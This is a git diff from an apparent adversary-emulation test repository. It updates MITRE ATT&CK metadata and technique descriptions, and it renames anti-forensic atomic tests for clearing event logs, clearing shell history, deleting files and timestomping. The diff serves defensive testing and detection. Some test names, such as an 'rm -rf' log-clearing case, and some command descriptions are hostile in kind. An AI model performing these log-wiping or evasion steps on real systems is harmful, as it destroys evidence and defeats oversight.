- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-02T19:44:47.843Z'
- created: '2020-03-02T19:15:44.182Z'
+ name: Spearphishing Link
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1566.002
+ url: https://attack.mitre.org/techniques/T1566/002
+ - external_id: CAPEC-163
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/163.html
+ - source_name: Trend Micro Pawn Storm OAuth 2017
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
+ description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication
+ in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
x_mitre_platforms:
- Linux
- macOS
@@ -50136,10 +51631,12 @@ initial-access:
phase_name: initial-access
modified: '2020-03-28T00:04:46.264Z'
created: '2020-03-02T19:24:00.951Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Anti-virus
+ - Web proxy
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: "Because most common third-party services used for spearphishing
via service leverage TLS encryption, SSL/TLS inspection is generally required
to detect the initial communication/delivery. With SSL/TLS inspection intrusion
@@ -50150,12 +51647,10 @@ initial-access:
Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe)
for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203)
or usage of malicious scripts."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Anti-virus
- - Web proxy
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1195:
technique:
@@ -50235,44 +51730,45 @@ initial-access:
phase_name: initial-access
modified: '2020-03-23T12:51:45.574Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Veeral Patel
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - Web proxy
+ - File monitoring
x_mitre_detection: Use verification of distributed binaries through hash checking
or other integrity checking mechanisms. Scan downloads for malicious signatures
and attempt to test software and updates prior to deployment while taking
note of potential suspicious activity. Perform physical inspection of hardware
to look for potential tampering.
- x_mitre_data_sources:
- - Web proxy
- - File monitoring
- x_mitre_version: '1.2'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_contributors:
+ - Veeral Patel
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1199:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1199
- external_id: T1199
+ id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.
- name: Trusted Relationship
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1199
+ external_id: T1199
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-10-11T15:20:53.687Z'
+ modified: '2020-07-14T19:38:14.299Z'
created: '2018-04-18T17:59:24.739Z'
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- Windows
@@ -50336,31 +51832,13 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -50371,9 +51849,27 @@ initial-access:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index abc4edfd..acf3f2de 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -2,7 +2,9 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.
-Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain. In cloud environments, many typical utilities may be used to discover remote systems depending upon the host operating system. In addition, cloud environments often provide APIs that serve information about remote systems and services.
+Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.
+
+Within IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)
## Atomic Tests
diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md
index 3144f78f..4659afd9 100644
--- a/atomics/T1027.001/T1027.001.md
+++ b/atomics/T1027.001/T1027.001.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.001)
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
-Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
+Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
## Atomic Tests
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 030f524b..042692fc 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -6,7 +6,7 @@ Payloads may be compressed, archived, or encrypted in order to avoid detection.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
-Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
+Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
## Atomic Tests
diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md
index 7e8f9b47..c4c9ab12 100644
--- a/atomics/T1047/T1047.md
+++ b/atomics/T1047/T1047.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
-An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
+An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
## Atomic Tests
diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md
index c09b83ca..1e6a7d7a 100644
--- a/atomics/T1059.004/T1059.004.md
+++ b/atomics/T1059.004/T1059.004.md
@@ -1,8 +1,10 @@
-# T1059.004 - Bash
+# T1059.004 - Unix Shell
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1059.004)
-Adversaries may abuse Bash commands and scripts for execution. Bash, the primary macOS (through Mojave) and Linux shell, can control every aspect of a system, with certain commands requiring elevated privileges.
+Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
-Bash scripts (.sh) provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of Bash scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
+
+Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
## Atomic Tests
diff --git a/atomics/T1551.001/T1551.001.md b/atomics/T1070.001/T1070.001.md
similarity index 97%
rename from atomics/T1551.001/T1551.001.md
rename to atomics/T1070.001/T1070.001.md
index ea84e8b2..98a42e48 100644
--- a/atomics/T1551.001/T1551.001.md
+++ b/atomics/T1070.001/T1070.001.md
@@ -1,5 +1,5 @@
-# T1551.001 - Clear Windows Event Logs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.001)
+# T1070.001 - Clear Windows Event Logs
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.001)
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
diff --git a/atomics/T1551.001/T1551.001.yaml b/atomics/T1070.001/T1070.001.yaml
similarity index 94%
rename from atomics/T1551.001/T1551.001.yaml
rename to atomics/T1070.001/T1070.001.yaml
index dab90de7..a2b688b4 100644
--- a/atomics/T1551.001/T1551.001.yaml
+++ b/atomics/T1070.001/T1070.001.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.001
+attack_technique: T1070.001
display_name: 'Indicator Removal on Host: Clear Windows Event Logs'
atomic_tests:
- name: Clear Logs
diff --git a/atomics/T1551.002/T1551.002.md b/atomics/T1070.002/T1070.002.md
similarity index 97%
rename from atomics/T1551.002/T1551.002.md
rename to atomics/T1070.002/T1070.002.md
index f1fd54be..75b5f4e1 100644
--- a/atomics/T1551.002/T1551.002.md
+++ b/atomics/T1070.002/T1070.002.md
@@ -1,5 +1,5 @@
-# T1551.002 - Clear Linux or Mac System Logs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.002)
+# T1070.002 - Clear Linux or Mac System Logs
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.002)
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* /var/log/messages:: General and system-related messages
diff --git a/atomics/T1551.002/T1551.002.yaml b/atomics/T1070.002/T1070.002.yaml
similarity index 97%
rename from atomics/T1551.002/T1551.002.yaml
rename to atomics/T1070.002/T1070.002.yaml
index e9b1fbfe..b1284938 100644
--- a/atomics/T1551.002/T1551.002.yaml
+++ b/atomics/T1070.002/T1070.002.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.002
+attack_technique: T1070.002
display_name: 'Indicator Removal on Host: Clear Linux or Mac System Logs'
atomic_tests:
- name: rm -rf
diff --git a/atomics/T1551.003/T1551.003.md b/atomics/T1070.003/T1070.003.md
similarity index 98%
rename from atomics/T1551.003/T1551.003.md
rename to atomics/T1070.003/T1070.003.md
index 32a927a3..46641601 100644
--- a/atomics/T1551.003/T1551.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -1,5 +1,5 @@
-# T1551.003 - Clear Command History
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.003)
+# T1070.003 - Clear Command History
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.003)
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.
These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
diff --git a/atomics/T1551.003/T1551.003.yaml b/atomics/T1070.003/T1070.003.yaml
similarity index 98%
rename from atomics/T1551.003/T1551.003.yaml
rename to atomics/T1070.003/T1070.003.yaml
index 2935454c..4b0ce612 100644
--- a/atomics/T1551.003/T1551.003.yaml
+++ b/atomics/T1070.003/T1070.003.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.003
+attack_technique: T1070.003
display_name: 'Indicator Removal on Host: Clear Command History'
atomic_tests:
- name: Clear Bash history (rm)
diff --git a/atomics/T1551.004/T1551.004.md b/atomics/T1070.004/T1070.004.md
similarity index 99%
rename from atomics/T1551.004/T1551.004.md
rename to atomics/T1070.004/T1070.004.md
index 953f8393..edfd9ebd 100644
--- a/atomics/T1551.004/T1551.004.md
+++ b/atomics/T1070.004/T1070.004.md
@@ -1,5 +1,5 @@
-# T1551.004 - File Deletion
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.004)
+# T1070.004 - File Deletion
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.004)
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
diff --git a/atomics/T1551.004/T1551.004.yaml b/atomics/T1070.004/T1070.004.yaml
similarity index 99%
rename from atomics/T1551.004/T1551.004.yaml
rename to atomics/T1070.004/T1070.004.yaml
index 8b74b0db..d1b0a91b 100644
--- a/atomics/T1551.004/T1551.004.yaml
+++ b/atomics/T1070.004/T1070.004.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.004
+attack_technique: T1070.004
display_name: 'Indicator Removal on Host: File Deletion'
atomic_tests:
- name: Delete a single file - Linux/macOS
diff --git a/atomics/T1551.005/T1551.005.md b/atomics/T1070.005/T1070.005.md
similarity index 97%
rename from atomics/T1551.005/T1551.005.md
rename to atomics/T1070.005/T1070.005.md
index 41cc78fd..e0be0d89 100644
--- a/atomics/T1551.005/T1551.005.md
+++ b/atomics/T1070.005/T1070.005.md
@@ -1,5 +1,5 @@
-# T1551.005 - Network Share Connection Removal
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.005)
+# T1070.005 - Network Share Connection Removal
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.005)
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)
## Atomic Tests
diff --git a/atomics/T1551.005/T1551.005.yaml b/atomics/T1070.005/T1070.005.yaml
similarity index 96%
rename from atomics/T1551.005/T1551.005.yaml
rename to atomics/T1070.005/T1070.005.yaml
index 6320807d..d9e3fba4 100644
--- a/atomics/T1551.005/T1551.005.yaml
+++ b/atomics/T1070.005/T1070.005.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.005
+attack_technique: T1070.005
display_name: 'Indicator Removal on Host: Network Share Connection Removal'
atomic_tests:
- name: Add Network Share
diff --git a/atomics/T1551.006/T1551.006.md b/atomics/T1070.006/T1070.006.md
similarity index 99%
rename from atomics/T1551.006/T1551.006.md
rename to atomics/T1070.006/T1070.006.md
index 522ff630..113c7bb5 100644
--- a/atomics/T1551.006/T1551.006.md
+++ b/atomics/T1070.006/T1070.006.md
@@ -1,5 +1,5 @@
-# T1551.006 - Timestomp
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551.006)
+# T1070.006 - Timestomp
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070.006)
Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
diff --git a/atomics/T1551.006/T1551.006.yaml b/atomics/T1070.006/T1070.006.yaml
similarity index 99%
rename from atomics/T1551.006/T1551.006.yaml
rename to atomics/T1070.006/T1070.006.yaml
index b793b6e9..f2e720e7 100644
--- a/atomics/T1551.006/T1551.006.yaml
+++ b/atomics/T1070.006/T1070.006.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551.006
+attack_technique: T1070.006
display_name: 'Indicator Removal on Host: Timestomp'
atomic_tests:
- name: Set a file's access timestamp
diff --git a/atomics/T1551/T1551.md b/atomics/T1070/T1070.md
similarity index 97%
rename from atomics/T1551/T1551.md
rename to atomics/T1070/T1070.md
index d27ead91..53bc1937 100644
--- a/atomics/T1551/T1551.md
+++ b/atomics/T1070/T1070.md
@@ -1,5 +1,5 @@
-# T1551 - Indicator Removal on Host
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1551)
+# T1070 - Indicator Removal on Host
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
diff --git a/atomics/T1551/T1551.yaml b/atomics/T1070/T1070.yaml
similarity index 96%
rename from atomics/T1551/T1551.yaml
rename to atomics/T1070/T1070.yaml
index 19bee78f..b5e0d7a6 100644
--- a/atomics/T1551/T1551.yaml
+++ b/atomics/T1070/T1070.yaml
@@ -1,4 +1,4 @@
-attack_technique: T1551
+attack_technique: T1070
display_name: Indicator Removal on Host
atomic_tests:
- name: Indicator Removal using FSUtil
diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md
index e9c9721d..e6109e9a 100644
--- a/atomics/T1106/T1106.md
+++ b/atomics/T1106/T1106.md
@@ -1,12 +1,12 @@
# T1106 - Native API
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
-Adversaries may interact with the native Windows application programming interface (API) to execute behaviors. Similar to the system call interface on UNIX systems, the Windows native API provides a controlled means to calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. The native API is leveraged by the OS during system boot (when other system components are not yet initialized) but is also exposed to user-mode applications via ntdll.dll and ntoskrnl.exe.(Citation: Microsoft NativeAPI)
+Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
-Functionality provided by the native API is also available via the Windows API, which provides a documented programming interface. For example, functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.(Citation: Microsoft CreateProcess) This allows API callers to execute a binary, run a CLI command, load modules, etc. Thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)
+Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
-Other software frameworks, such as Microsoft .NET, are also available to interact with the native API. These frameworks typically provide wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)
+Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
-Adversaries may abuse the native API as a means of execution. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API, and its hierarchy of interfaces, provide mechanisms to interact with and utilize a victimized system.
+Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.
## Atomic Tests
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index d70acee3..5dc66465 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -1,8 +1,8 @@
# T1119 - Automated Collection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1119)
-Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
+Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.
-This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) to identify and move files.
+This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.
## Atomic Tests
diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md
index d83b102a..c912c41a 100644
--- a/atomics/T1127.001/T1127.001.md
+++ b/atomics/T1127.001/T1127.001.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1127.001)
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
-Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
+Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
## Atomic Tests
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index d06fc8b8..c4d3066c 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1134.004)
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
